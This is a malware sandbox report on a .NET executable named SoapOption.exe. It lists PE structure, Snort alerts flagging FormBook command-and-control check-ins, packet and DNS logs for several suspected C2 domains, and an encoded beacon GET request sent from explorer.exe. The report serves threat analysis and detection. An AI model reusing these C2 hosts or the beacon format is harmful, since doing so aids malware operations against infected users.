                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xbbec40x57.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x4b68.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xb9f240xba000False0.81059937836data7.59789627336IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xbc0000x4b680x4c00False0.469212582237data4.53035066052IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xc20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0xbc1c00x25a8dBase III DBT, version number 0, next free block index 40
                                                        RT_ICON0xbe7680x10a8data
                                                        RT_ICON0xbf8100x988dBase III DBT, version number 0, next free block index 40
                                                        RT_ICON0xc01980x468GLS_BINARY_LSB_FIRST
                                                        RT_GROUP_ICON0xc06000x3edata
                                                        RT_VERSION0xc06400x338data
                                                        RT_MANIFEST0xc09780x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0000 0x04b0
                                                        LegalCopyrightCopyright Kanal 2 2012
                                                        Assembly Version2.0.0.0
                                                        InternalNameSoapOption.exe
                                                        FileVersion2.0.0.0
                                                        CompanyNameKanal 2
                                                        LegalTrademarks
                                                        Comments
                                                        ProductNameeg2012
                                                        ProductVersion2.0.0.0
                                                        FileDescriptioneg2012
                                                        OriginalFilenameSoapOption.exe

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        06/10/21-17:59:39.007769TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.4151.106.118.75
                                                        06/10/21-17:59:39.007769TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.4151.106.118.75
                                                        06/10/21-17:59:39.007769TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.4151.106.118.75
                                                        06/10/21-17:59:56.257801TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4192.169.223.13
                                                        06/10/21-17:59:56.257801TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4192.169.223.13
                                                        06/10/21-17:59:56.257801TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4192.169.223.13

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jun 10, 2021 17:59:22.109391928 CEST4976380192.168.2.444.227.65.245
                                                        Jun 10, 2021 17:59:22.316430092 CEST804976344.227.65.245192.168.2.4
                                                        Jun 10, 2021 17:59:22.316554070 CEST4976380192.168.2.444.227.65.245
                                                        Jun 10, 2021 17:59:22.523013115 CEST804976344.227.65.245192.168.2.4
                                                        Jun 10, 2021 17:59:22.523107052 CEST4976380192.168.2.444.227.65.245
                                                        Jun 10, 2021 17:59:22.729912043 CEST804976344.227.65.245192.168.2.4
                                                        Jun 10, 2021 17:59:22.729955912 CEST804976344.227.65.245192.168.2.4
                                                        Jun 10, 2021 17:59:22.729983091 CEST804976344.227.65.245192.168.2.4
                                                        Jun 10, 2021 17:59:22.730145931 CEST4976380192.168.2.444.227.65.245
                                                        Jun 10, 2021 17:59:22.730232000 CEST4976380192.168.2.444.227.65.245
                                                        Jun 10, 2021 17:59:22.936537981 CEST804976344.227.65.245192.168.2.4
                                                        Jun 10, 2021 17:59:22.936641932 CEST804976344.227.65.245192.168.2.4
                                                        Jun 10, 2021 17:59:22.936832905 CEST4976380192.168.2.444.227.65.245
                                                        Jun 10, 2021 17:59:27.829025030 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:27.963891983 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:27.964020014 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:27.964210987 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.100598097 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103754044 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103806973 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103830099 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103847027 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103867054 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103885889 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103904963 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103915930 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.103924990 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103945971 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.103964090 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.104021072 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.104074955 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.104319096 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238409042 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238464117 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238502026 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238539934 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238578081 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238625050 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238643885 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238670111 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238683939 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238692045 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238696098 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238699913 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238708973 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238730907 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238749981 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238776922 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238789082 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238826990 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238847017 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238859892 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238867044 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238867044 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238905907 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238954067 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.238955021 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238980055 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.238996983 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.239010096 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.239036083 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.239047050 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.239074945 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.239083052 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.239128113 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.239134073 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.239185095 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.239207029 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.239224911 CEST8049764198.185.159.144192.168.2.4
                                                        Jun 10, 2021 17:59:28.239237070 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:28.239273071 CEST4976480192.168.2.4198.185.159.144
                                                        Jun 10, 2021 17:59:33.206686974 CEST4976780192.168.2.478.31.67.91
                                                        Jun 10, 2021 17:59:33.259607077 CEST804976778.31.67.91192.168.2.4
                                                        Jun 10, 2021 17:59:33.259829998 CEST4976780192.168.2.478.31.67.91
                                                        Jun 10, 2021 17:59:33.260176897 CEST4976780192.168.2.478.31.67.91
                                                        Jun 10, 2021 17:59:33.312942028 CEST804976778.31.67.91192.168.2.4
                                                        Jun 10, 2021 17:59:33.313033104 CEST804976778.31.67.91192.168.2.4
                                                        Jun 10, 2021 17:59:33.313057899 CEST804976778.31.67.91192.168.2.4
                                                        Jun 10, 2021 17:59:33.323225975 CEST4976780192.168.2.478.31.67.91
                                                        Jun 10, 2021 17:59:33.324178934 CEST4976780192.168.2.478.31.67.91
                                                        Jun 10, 2021 17:59:33.377404928 CEST804976778.31.67.91192.168.2.4
                                                        Jun 10, 2021 17:59:38.739728928 CEST4976880192.168.2.4151.106.118.75
                                                        Jun 10, 2021 17:59:39.007287979 CEST8049768151.106.118.75192.168.2.4
                                                        Jun 10, 2021 17:59:39.007587910 CEST4976880192.168.2.4151.106.118.75
                                                        Jun 10, 2021 17:59:39.007769108 CEST4976880192.168.2.4151.106.118.75
                                                        Jun 10, 2021 17:59:39.276942968 CEST8049768151.106.118.75192.168.2.4
                                                        Jun 10, 2021 17:59:39.509634018 CEST4976880192.168.2.4151.106.118.75
                                                        Jun 10, 2021 17:59:39.816592932 CEST8049768151.106.118.75192.168.2.4
                                                        Jun 10, 2021 17:59:41.822793961 CEST8049768151.106.118.75192.168.2.4
                                                        Jun 10, 2021 17:59:41.822899103 CEST4976880192.168.2.4151.106.118.75
                                                        Jun 10, 2021 17:59:41.823045969 CEST8049768151.106.118.75192.168.2.4
                                                        Jun 10, 2021 17:59:41.823162079 CEST4976880192.168.2.4151.106.118.75
                                                        Jun 10, 2021 17:59:45.087789059 CEST4976980192.168.2.4163.43.122.119
                                                        Jun 10, 2021 17:59:45.422576904 CEST8049769163.43.122.119192.168.2.4
                                                        Jun 10, 2021 17:59:45.422744989 CEST4976980192.168.2.4163.43.122.119
                                                        Jun 10, 2021 17:59:45.423042059 CEST4976980192.168.2.4163.43.122.119
                                                        Jun 10, 2021 17:59:45.758968115 CEST8049769163.43.122.119192.168.2.4
                                                        Jun 10, 2021 17:59:45.760066986 CEST8049769163.43.122.119192.168.2.4
                                                        Jun 10, 2021 17:59:45.760092020 CEST8049769163.43.122.119192.168.2.4
                                                        Jun 10, 2021 17:59:45.760278940 CEST4976980192.168.2.4163.43.122.119

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jun 10, 2021 17:57:46.487735987 CEST6529853192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:46.557106018 CEST53652988.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:47.958292961 CEST5912353192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:48.009334087 CEST53591238.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:48.288878918 CEST5453153192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:48.369276047 CEST53545318.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:49.118768930 CEST4971453192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:49.168771029 CEST53497148.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:49.832945108 CEST5802853192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:49.893295050 CEST53580288.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:50.253917933 CEST5309753192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:50.305176973 CEST53530978.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:51.386522055 CEST4925753192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:51.439377069 CEST53492578.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:52.502564907 CEST6238953192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:52.552805901 CEST53623898.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:53.608962059 CEST4991053192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:53.662264109 CEST53499108.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:54.890736103 CEST5585453192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:54.943711996 CEST53558548.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:55.792382956 CEST6454953192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:55.844660997 CEST53645498.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:56.942357063 CEST6315353192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:56.992871046 CEST53631538.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:57.749197960 CEST5299153192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:57.799285889 CEST53529918.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:58.786149025 CEST5370053192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:58.836502075 CEST53537008.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:59.636758089 CEST5172653192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:59.686780930 CEST53517268.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:00.548912048 CEST5679453192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:00.604336977 CEST53567948.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:01.433203936 CEST5653453192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:01.492600918 CEST53565348.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:02.619153976 CEST5662753192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:02.671348095 CEST53566278.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:03.985651016 CEST5662153192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:04.071894884 CEST53566218.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:04.954133987 CEST6311653192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:05.006649017 CEST53631168.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:05.788516045 CEST6407853192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:05.840137959 CEST53640788.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:06.840332031 CEST6480153192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:06.890369892 CEST53648018.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:18.230130911 CEST6172153192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:18.306412935 CEST53617218.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:38.895137072 CEST5125553192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:39.032160997 CEST53512558.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:40.074192047 CEST6152253192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:40.242304087 CEST53615228.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:40.620681047 CEST5233753192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:40.694768906 CEST5504653192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:40.698304892 CEST53523378.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:40.757975101 CEST53550468.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:41.253323078 CEST4961253192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:41.314955950 CEST53496128.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:42.085366011 CEST4928553192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:42.148837090 CEST53492858.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:43.184974909 CEST5060153192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:43.237965107 CEST53506018.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:44.274621010 CEST6087553192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:44.427468061 CEST53608758.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:45.288420916 CEST5644853192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:45.342664003 CEST53564488.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:46.649956942 CEST5917253192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:46.713717937 CEST53591728.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:48.234550953 CEST6242053192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:48.296334982 CEST53624208.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:49.085917950 CEST6057953192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:49.145890951 CEST53605798.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:58.618691921 CEST5018353192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:58.681042910 CEST53501838.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:21.936187029 CEST6153153192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:22.102794886 CEST53615318.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:27.751991987 CEST4922853192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:27.827166080 CEST53492288.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:31.289874077 CEST5979453192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:31.358530045 CEST53597948.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:32.912105083 CEST5591653192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:32.972131968 CEST53559168.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:33.123146057 CEST5275253192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:33.205077887 CEST53527528.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:38.369435072 CEST6054253192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:38.737392902 CEST53605428.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:44.536937952 CEST6068953192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:45.085048914 CEST53606898.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:50.787945986 CEST6420653192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:50.853202105 CEST53642068.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:55.995110035 CEST5090453192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:56.064225912 CEST53509048.8.8.8192.168.2.4
                                                        Jun 10, 2021 18:00:01.465610027 CEST5752553192.168.2.48.8.8.8
                                                        Jun 10, 2021 18:00:01.821636915 CEST53575258.8.8.8192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Jun 10, 2021 17:59:21.936187029 CEST192.168.2.48.8.8.80xbaa6Standard query (0)www.hiddenwholesale.comA (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:27.751991987 CEST192.168.2.48.8.8.80xa757Standard query (0)www.anewdistraction.comA (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:33.123146057 CEST192.168.2.48.8.8.80x88aaStandard query (0)www.cleanxcare.comA (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:38.369435072 CEST192.168.2.48.8.8.80xc537Standard query (0)www.biztekno.comA (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:44.536937952 CEST192.168.2.48.8.8.80x8971Standard query (0)www.69-1hn7uc.netA (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:50.787945986 CEST192.168.2.48.8.8.80x9293Standard query (0)www.cyrilgraze.comA (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:55.995110035 CEST192.168.2.48.8.8.80xb3bcStandard query (0)www.centergolosinas.comA (IP address)IN (0x0001)
                                                        Jun 10, 2021 18:00:01.465610027 CEST192.168.2.48.8.8.80x9f6Standard query (0)www.adultpeace.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Jun 10, 2021 17:59:22.102794886 CEST8.8.8.8192.168.2.40xbaa6No error (0)www.hiddenwholesale.compixie.porkbun.comCNAME (Canonical name)IN (0x0001)
                                                        Jun 10, 2021 17:59:22.102794886 CEST8.8.8.8192.168.2.40xbaa6No error (0)pixie.porkbun.com44.227.65.245A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:22.102794886 CEST8.8.8.8192.168.2.40xbaa6No error (0)pixie.porkbun.com44.227.76.166A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:27.827166080 CEST8.8.8.8192.168.2.40xa757No error (0)www.anewdistraction.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                        Jun 10, 2021 17:59:27.827166080 CEST8.8.8.8192.168.2.40xa757No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:27.827166080 CEST8.8.8.8192.168.2.40xa757No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:27.827166080 CEST8.8.8.8192.168.2.40xa757No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:27.827166080 CEST8.8.8.8192.168.2.40xa757No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:33.205077887 CEST8.8.8.8192.168.2.40x88aaNo error (0)www.cleanxcare.comcleanxcare.comCNAME (Canonical name)IN (0x0001)
                                                        Jun 10, 2021 17:59:33.205077887 CEST8.8.8.8192.168.2.40x88aaNo error (0)cleanxcare.com78.31.67.91A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:38.737392902 CEST8.8.8.8192.168.2.40xc537No error (0)www.biztekno.combiztekno.comCNAME (Canonical name)IN (0x0001)
                                                        Jun 10, 2021 17:59:38.737392902 CEST8.8.8.8192.168.2.40xc537No error (0)biztekno.com151.106.118.75A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:45.085048914 CEST8.8.8.8192.168.2.40x8971No error (0)www.69-1hn7uc.net163.43.122.119A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:50.853202105 CEST8.8.8.8192.168.2.40x9293No error (0)www.cyrilgraze.com104.21.65.7A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:50.853202105 CEST8.8.8.8192.168.2.40x9293No error (0)www.cyrilgraze.com172.67.138.177A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:56.064225912 CEST8.8.8.8192.168.2.40xb3bcNo error (0)www.centergolosinas.comcentergolosinas.comCNAME (Canonical name)IN (0x0001)
                                                        Jun 10, 2021 17:59:56.064225912 CEST8.8.8.8192.168.2.40xb3bcNo error (0)centergolosinas.com192.169.223.13A (IP address)IN (0x0001)
                                                        Jun 10, 2021 18:00:01.821636915 CEST8.8.8.8192.168.2.40x9f6No error (0)www.adultpeace.comadultpeace.comCNAME (Canonical name)IN (0x0001)
                                                        Jun 10, 2021 18:00:01.821636915 CEST8.8.8.8192.168.2.40x9f6No error (0)adultpeace.com163.44.239.73A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • www.hiddenwholesale.com
                                                        • www.anewdistraction.com
                                                        • www.cleanxcare.com
                                                        • www.biztekno.com
                                                        • www.69-1hn7uc.net
                                                        • www.cyrilgraze.com
                                                        • www.centergolosinas.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.44976344.227.65.24580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 10, 2021 17:59:22.523107052 CEST3666OUTGET /p2io/?xN6x=es7Y2j6d/8vbylETtmEK+cycNhd4T49F/A456A8m/a4HPEjAATL8KRpgCeYlIlfO3VWH&YluDM=Ofc4YV0pThsp HTTP/1.1
                                                        Host: www.hiddenwholesale.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jun 10, 2021 17:59:22.729955912 CEST3667INHTTP/1.1 307 Temporary Redirect
                                                        Server: openresty
                                                        Date: Thu, 10 Jun 2021 15:59:22 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 168
                                                        Connection: close
                                                        Location: http://hiddenwholesale.com
                                                        X-Frame-Options: sameorigin
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>
                                                        Jun 10, 2021 17:59:22.936537981 CEST3667INHTTP/1.1 307 Temporary Redirect
                                                        Server: openresty
                                                        Date: Thu, 10 Jun 2021 15:59:22 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 168
                                                        Connection: close
                                                        Location: http://hiddenwholesale.com
                                                        X-Frame-Options: sameorigin
